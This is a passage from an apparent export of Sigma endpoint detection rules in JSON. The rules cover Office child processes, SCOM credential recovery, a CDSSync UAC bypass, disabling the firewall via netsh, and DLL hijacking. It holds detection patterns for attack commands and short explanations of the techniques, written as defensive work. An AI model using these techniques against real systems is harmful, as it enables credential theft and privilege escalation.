CommandLine|startswith:\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\Windows\\System32\\mshtml.dll,PrintHTML'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\mshtml.dll,PrintHTML'\n\n exclusion_pkcs:\n CommandLine|startswith:\n - '?:\\Windows\\SysWOW64\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7'\n - '?:\\Windows\\System32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7'\n\n exclusion_photoviewer:\n CommandLine|contains:\n # \"C:\\windows\\System32\\rundll32.exe\" \"C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll\", ImageView_Fullscreen C:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\2UBOS01P\\Screenshot_20210113-145546_WhatsApp.jpg\n - '?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll'\n - '?:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll'\n\n exclusion_securecrt_1:\n CommandLine|contains|all:\n - '?:\\Windows\\System32\\cmd.exe /c'\n - 'AppData'\n - 'Local'\n - 'VanDyke'\n - 'Software'\n - 'SecureCRT.exe'\n\n exclusion_securecrt_2:\n CommandLine|contains|all:\n - 'powershell -command Get-ChildItem -Path'\n - Recurse -include '\\*SecureCRT.exe' | %{Write-host $_.FullName}\n\n exclusion_securecrt_3:\n CommandLine|startswith: '?:\\Windows\\System32\\cmd.exe /c SecureCRT.exe'\n\n exclusion_office_repair_log:\n CommandLine|endswith:\n - '\\msiexec.exe /focmu {901?????-00??-0000-?000-0000000FF1CE} /lwieap ?:\\\\*\\Microsoft Office *.txt /qb+'\n - '\\msiexec.exe /focmu {901?????-00??-0000-?000-0000000FF1CE} /qb+'\n\n exclusion_activex_mail:\n CommandLine|contains:\n - '\\dwa85W.dll,MailToProtocolHandler mailto:'\n - '\\dwa9W.dll,MailToProtocolHandler mailto:'\n\n exclusion_driver_eject:\n CommandLine|startswith: '?:\\windows\\System32\\RunDll32.exe ?:\\windows\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification'\n\n exclusion_chrome_start:\n CommandLine: '?:\\Windows\\System32\\cmd.exe start chrome.exe'\n\n exclusion_genapi:\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe 
/c ?:\\Users\\\\*\\AppData\\Roaming\\Genapi\\Synchro\\Outlook\\RegDll-iNot.cmd ?:\\Users\\\\*\\AppData\\Local\\Apps\\'\n\n exclusion_screencapture:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\shimgvw.dll,ImageView_PrintTo /pt'\n\n exclusion_choice:\n CommandLine|startswith:\n - '?:\\Windows\\SysWOW64\\cmd.exe /c choice'\n - '?:\\Windows\\System32\\cmd.exe /c choice'\n\n exclusion_udcofficeaddin:\n CommandLine: 'regsvr32 /s /n /i ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\UDCOfficeAddin*.dll'\n\n exclusion_routers_config:\n CommandLine: 'powershell -command Invoke-WebRequest -URI *http://*/cgi-bin/cvsweb/Routeurs/configs/* -UseBasicParsing | Select-Object -ExpandProperty Content'\n\n exclusion_zimbra_1:\n # Zimbra Connector for Microsoft Outlook\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\regsvr32.exe LSMSSP32.dll /s'\n - '?:\\Windows\\System32\\regsvr32.exe LSMSSP32.dll /s'\n ParentImage|endswith: '\\OUTLOOK.EXE'\n\n exclusion_zimbra_2:\n CommandLine:\n - '?:\\Windows\\SysWOW64\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\ZimbraConnectorOLK*.msi'\n - '?:\\Windows\\System32\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Temp\\ZimbraConnectorOLK*.msi'\n\n exclusion_hpmsn:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\\\*\\hpmsn???.dll,MonitorPrintJobStatus '\n\n exclusion_teams:\n CommandLine|startswith: '?:\\windows\\system32\\cmd.exe /c start microsoft-edge:https://teams.microsoft.com/'\n\n exclusion_grooveutil:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\Rundll32.exe ?:\\Program Files\\Microsoft Office\\Office??\\GrooveUtil.DLL,GetResourceModulePath'\n - '?:\\WINDOWS\\system32\\Rundll32.exe ?:\\Program Files (x86)\\Microsoft Office\\Office??\\GrooveUtil.DLL,GetResourceModulePath'\n\n exclusion_poweruser:\n CommandLine|contains: 'msiexec.exe /i ?:\\Users\\\\*\\Power-user*.msi /QN'\n\n exclusion_striata:\n CommandLine|contains: 'rundll32.exe 
?:\\Users\\\\*\\AppData\\Local\\Striata-Reader\\keymail.dll,OpenDocument'\n\n exclusion_hp:\n CommandLine|contains:\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files\\Hewlett-Packard\\Privacy Manager Sign and Chat\\Bin\\DPCertWorks.dll,ExpirationCheck'\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files (x86)\\Hewlett-Packard\\Privacy Manager Sign and Chat\\Bin\\DPCertWorks.dll,ExpirationCheck'\n\n exclusion_sagex3:\n CommandLine|contains: '\\msiexec.exe /i ?:\\Users\\\\*\\AppData\\Local\\Sage\\SageX3OfficeAddIn.msi'\n\n exclusion_zedmail:\n CommandLine|contains:\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail\\zedmail.dll,ZMWTS32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail\\zedmail32.dll,ZMWTS32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail\\zci.dll,NPAFMRD32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail Trial\\zedmail.dll,ZMWTS32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail Trial\\zedmail32.dll,ZMWTS32W'\n - 'RunDll32.exe ?:\\Program Files\\Prim?X\\ZedMail Trial\\zci.dll,NPAFMRD32W'\n\n exclusion_circdna:\n CommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c */CircRNA profilling/circRNA matrix/Cells/Cells'\n\n exclusion_neofox:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\cmd.exe /c *\\NeoFox Syntax Checker\\NeoFox*\\NeoFox\\scriptLauncher.bat'\n - '?:\\WINDOWS\\system32\\cmd.exe /c *\\NeoFox Syntax Checker Versions\\NeoFox *\\NeoFox\\scriptLauncher.bat'\n\n exclusion_locales:\n CommandLine:\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Set-Culture ??'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -command Set-TimeZone -Id ??'\n\n exclusion_inetcpl:\n CommandLine|contains|all:\n - 'RunDll32.exe InetCpl.Cpl'\n - 'ClearMyTracksByProcess'\n\n # https://s3.amazonaws.com/helpscout.net/docs/assets/583d8b88c6979106d3737d03/attachments/6194bed82b380503dfe05bb4/MIMH_FTC_GuidePublipostageVelocity.pdf\n exclusion_imhoweb:\n 
CommandLine|contains|all:\n - '?:\\WINDOWS\\system32\\cmd.exe /c'\n - '\\ImhowebXDocReports\\Preview\\bin?xdrtools.bat'\n - 'imhoweb.fields.xml'\n\n exclusion_inot:\n CommandLine|startswith: '?:\\windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Roaming\\Genapi\\Synchro\\Outlook\\RegDll-iNot.cmd'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f4677ab-ed23-4357-929d-c15459d867f3",
"rule_name": "Dangerous Process Started by Microsoft Office Application",
"rule_description": "Detects suspicious child processes spawned by Microsoft Office applications (Word, Excel, PowerPoint, Publisher, Visio, ...), which may indicate the execution of malicious code via phishing documents or macro abuse.\nThis behavior is commonly observed in attacks leveraging weaponized Office files to download or execute additional payloads.\nIt is recommended to investigate the command-line as well as to correlate this alert with other commands executed around it to determine its legitimacy.\n",
"rule_creation_date": "2020-09-30",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f470a12-2426-4734-b2d3-657575552dae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625562Z",
"creation_date": "2026-03-23T11:45:34.625564Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625568Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-2/",
"https://attack.mitre.org/techniques/T1552/002/"
],
"name": "t1552_002_scom_runas_credentials_recovery_via_registry.yml",
"content": "title: SCOM RunAs Credentials Recovery via Registry\nid: 8f470a12-2426-4734-b2d3-657575552dae\ndescription: |\n Detects a recovery of the SCOM RunAs credential blobs in the registry under \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\HealthService\\Parameters\\Management Groups\\\\SSDB\\SSIDs\".\n System Center Operations Manager (SCOM), the Microsoft cross-platform data center monitoring system for operating systems and hypervisors, uses these blobs for its health service.\n Feeding the extracted blob to a tool such as SharpDPAPI would allow the actor to resolve the master key and decrypt the payload, revealing the clear-text RunAs username and password.\n It is recommended to check the related process for suspicious activities.\nreferences:\n - https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-2/\n - https://attack.mitre.org/techniques/T1552/002/\ndate: 2025/12/17\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.t1555\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: ReadValue\n TargetObject:\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\SERVICES\\HEALTHSERVICE\\PARAMETERS\\MANAGEMENT GROUPS\\\\*\\SSDB\\SSIDS\\\\*'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\SERVICES\\HEALTHSERVICE\\PARAMETERS\\MANAGEMENT GROUPS\\\\*\\SSDB\\SSIDS\\\\*'\n\n exclusion_scom_healthservice:\n ProcessOriginalFileName: 'HealthService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f470a12-2426-4734-b2d3-657575552dae",
"rule_name": "SCOM RunAs Credentials Recovery via Registry",
"rule_description": "Detects a recovery of the SCOM RunAs credential blobs in the registry under \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\HealthService\\Parameters\\Management Groups\\\\SSDB\\SSIDs\".\nSystem Center Operations Manager (SCOM), the Microsoft cross-platform data center monitoring system for operating systems and hypervisors, uses these blobs for its health service.\nFeeding the extracted blob to a tool such as SharpDPAPI would allow the actor to resolve the master key and decrypt the payload, revealing the clear-text RunAs username and password.\nIt is recommended to check the related process for suspicious activities.\n",
"rule_creation_date": "2025-12-17",
"rule_modified_date": "2025-12-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.002",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f7af33c-6aa5-4203-abdc-0f8909589f83",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092517Z",
"creation_date": "2026-03-23T11:45:34.092519Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092523Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/AzAgarampur/byeintegrity5-uac"
],
"name": "t1548_002_uac_bypass_cdssync.yml",
"content": "title: UAC Bypass Executed via CDSSync\nid: 8f7af33c-6aa5-4203-abdc-0f8909589f83\ndescription: |\n Detects attempts to bypass UAC through the CDSSync scheduled task vulnerability.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n This technique manipulates the SystemRoot environment variable and exploits the Task Scheduler COM interface to load an unsigned npmproxy.dll, triggering elevated command execution through the CDSSync task in \\Microsoft\\Windows\\WlanSvc.\n The attack bypasses UAC by avoiding the Application Information service entirely through task scheduler abuse.\n It is recommended to verify DLL signatures in modified SystemRoot paths, and perform analysis on the unsigned DLLs.\nreferences:\n - https://github.com/AzAgarampur/byeintegrity5-uac\ndate: 2020/11/27\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - attack.execution\n - attack.t1053\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\taskhostw.exe'\n ImageLoaded|endswith: '\\npmproxy.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n exclusion_default_system_root:\n # This bypass use a custom path for %SystemRoot%.\n ImageLoaded: '?:\\Windows\\System32\\npmproxy.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f7af33c-6aa5-4203-abdc-0f8909589f83",
"rule_name": "UAC Bypass Executed via CDSSync",
"rule_description": "Detects attempts to bypass UAC through the CDSSync scheduled task vulnerability.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nThis technique manipulates the SystemRoot environment variable and exploits the Task Scheduler COM interface to load an unsigned npmproxy.dll, triggering elevated command execution through the CDSSync task in \\Microsoft\\Windows\\WlanSvc.\nThe attack bypasses UAC by avoiding the Application Information service entirely through task scheduler abuse.\nIt is recommended to verify DLL signatures in modified SystemRoot paths, and perform analysis on the unsigned DLLs.\n",
"rule_creation_date": "2020-11-27",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053",
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f81e67c-c038-4658-93ee-5173e50187a9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088389Z",
"creation_date": "2026-03-23T11:45:34.088392Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088396Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-contexts",
"https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1562_004_netsh_disable_firewall.yml",
"content": "title: Windows Firewall Disabled via netsh\nid: 8f81e67c-c038-4658-93ee-5173e50187a9\ndescription: |\n Detects when netsh is used to disable the Windows firewall.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.\n It is recommended to verify if the process performing this action has legitimate reasons to do it.\nreferences:\n - https://docs.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-contexts\n - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/software/S0108/\ndate: 2021/05/07\nmodified: 2025/05/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.s0108\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\netsh.exe'\n - OriginalFileName: 'netsh.exe'\n\n selection_cmd_1:\n CommandLine|contains|all:\n - ' advfirewall '\n - ' set '\n - ' state '\n - ' off'\n\n selection_cmd_2:\n CommandLine|contains|all:\n - ' firewall '\n - ' set '\n - ' opmode '\n - 'disable'\n # There are shortcuts for all of those, we can't rely on them\n # selection_profile:\n # CommandLine|contains:\n # - ' allprofiles '\n # - ' currentprofile '\n # - ' domainprofile '\n # - ' privateprofile '\n # - ' publicprofile '\n\n exclusion_cegedim:\n ParentImage: '?:\\Program Files (x86)\\CEGEDIM\\CLM\\Outils\\clmprerequis.exe'\n\n exclusion_altiris:\n GrandparentImage: '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n\n exclusion_wapt:\n 
GrandparentImage: '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n\n exclusion_ccm:\n GrandparentImage: '?:\\Windows\\CCM\\TSManager.exe'\n\n exclusion_adminarsenal:\n GrandparentImage: '?:\\Windows\\AdminArsenal\\PDQInventoryRemoteCommand\\service-?\\PDQInventoryRemoteCommand-?.exe'\n\n condition: selection_bin and 1 of selection_cmd_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f81e67c-c038-4658-93ee-5173e50187a9",
"rule_name": "Windows Firewall Disabled via netsh",
"rule_description": "Detects when netsh is used to disable the Windows firewall.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nChanges could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.\nIt is recommended to verify if the process performing this action has legitimate reasons to do it.\n",
"rule_creation_date": "2021-05-07",
"rule_modified_date": "2025-05-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f83af2f-2ff6-4bcb-b0dd-db41b1a24ba7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602601Z",
"creation_date": "2026-03-23T11:45:34.602604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602612Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_propsys.yml",
"content": "title: Unsigned propsys.dll Loaded\nid: 8f83af2f-2ff6-4bcb-b0dd-db41b1a24ba7\ndescription: |\n Detects a suspicious unsigned DLL named 'propsys.dll' loaded by a process that could be a target to DLL hijacking.\n Adversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\propsys.dll'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_signed:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n filter_legitimate:\n ImageLoaded|startswith:\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\System32\\propsys.dll'\n - '?:\\Windows\\SysWOW64\\propsys.dll'\n - '\\Device\\vmsmb\\VSMB-'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\propsys.dll'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\propsys.dll'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f83af2f-2ff6-4bcb-b0dd-db41b1a24ba7",
"rule_name": "Unsigned propsys.dll Loaded",
"rule_description": "Detects a suspicious unsigned DLL named 'propsys.dll' loaded by a process that could be a target of DLL hijacking.\nAdversaries may execute their own malicious payloads by planting a DLL in a specific path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f9ece2a-eee2-46a8-a109-58ff00b4a416",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080602Z",
"creation_date": "2026-03-23T11:45:34.080604Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080609Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1550903546916311043",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_onedrive.yml",
"content": "title: DLL Hijacking via OneDrive\nid: 8f9ece2a-eee2-46a8-a109-58ff00b4a416\ndescription: |\n Detects potential Windows DLL Hijacking via OneDrive.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1550903546916311043\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'OneDrive.exe'\n ImageLoaded|endswith:\n - '\\cscapi.dll'\n - '\\edputil.dll'\n - '\\secur32.dll'\n - '\\version.dll'\n - '\\wininet.dll'\n - '\\wtsapi32.dll'\n - '\\userenv.dll'\n - '\\sspicli.dll'\n - '\\profapi.dll'\n - '\\iphlpapi.dll'\n - '\\dwmapi.dll'\n - '\\wer.dll'\n - '\\uiautomation.dll'\n - '\\xmllite.dll'\n - '\\winhttp.dll'\n - '\\urlmon.dll'\n - '\\credui.dll'\n - '\\ncrypt.dll'\n - '\\propsys.dll'\n - '\\rstrtmgr.dll'\n - '\\iertutil.dll'\n - '\\srvcli.dll'\n - '\\netutils.dll'\n - '\\mpr.dll'\n - '\\netapi32.dll'\n - '\\winmm.dll'\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\dnsapi.dll'\n - '\\ntasn1.dll'\n - '\\wscapi.dll'\n - '\\msans1.dll'\n - '\\winsta.dll'\n - '\\cldapi.dll'\n - '\\fltlib.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 
'?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f9ece2a-eee2-46a8-a109-58ff00b4a416",
"rule_name": "DLL Hijacking via OneDrive",
"rule_description": "Detects potential Windows DLL Hijacking via OneDrive.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8fba9e6e-3fe4-45f3-bbec-1d4e0b2aca2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
